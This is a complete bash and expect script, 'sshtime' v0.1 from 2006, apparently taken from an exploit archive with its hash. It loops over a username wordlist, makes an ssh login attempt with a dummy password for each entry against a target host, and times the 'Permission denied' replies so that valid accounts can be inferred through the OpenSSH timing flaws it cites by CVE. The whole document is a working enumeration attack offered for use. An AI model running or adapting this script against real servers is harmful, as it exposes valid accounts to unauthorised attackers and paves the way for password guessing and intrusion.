sshtime v0.1 is a simple OpenSSH timing attack tool based on expect meant to remotely analyze timing differences in sshd "Permission denied" replies. Depending on OpenSSH version and configuration, it may lead to disclosure of valid usernames.
b57569d93458fb3032f8c9681c5bf741fcd8ec30007b182512af76f3c1f46e56
#!/bin/bash
#
# $Id: sshtime,v 1.3 2006/10/11 15:32:31 raptor Exp $
#
# sshtime v0.1 - Simple OpenSSH remote timing attack tool
# Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>
#
# SSHtime is a shell script based on expect meant to remotely analyze timing
# differences in sshd "Permission denied" replies. Depending on OpenSSH
# version and configuration, it may lead to disclosure of valid usernames.
#
# See also:
# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0190
# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5229
#
# Usage example:
# [make sure the target hostkey has been approved before]
# ./sshtime 192.168.0.1 dict.txt
#
# Some vars
port=22
# Command line
host=$1
dict=$2
# Local functions
function head() {
echo ""
echo "sshtime v0.1 - Simple OpenSSH remote timing attack tool"
echo "Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>"
echo ""
}
function foot() {
echo ""
exit 0
}
function usage() {
head
echo "[make sure the target hostkey has been approved before]"
echo ""
echo "usage : ./sshtime <target> <wordlist>"
echo "example: ./sshtime 192.168.0.1 dict.txt"
foot
}
function notfound() {
head
echo "error : expect interpreter not found!"
foot
}
# Check if expect is there
expect=`which expect 2>/dev/null`
if [ $? -ne 0 ]; then
notfound
fi
# Input control
if [ -z "$2" ]; then
usage
fi
# Perform the bruteforce attack
head
for user in `cat $dict`
do
echo -ne "$user@$host\t\t"
(time -p $expect -c "log_user 0; spawn -noecho ssh -p $port $host -l $user; for {} 1 {} {expect -nocase \"password*\" {send \"dummy\r\"} eof {exit}}") 2>&1 | grep real
done
foot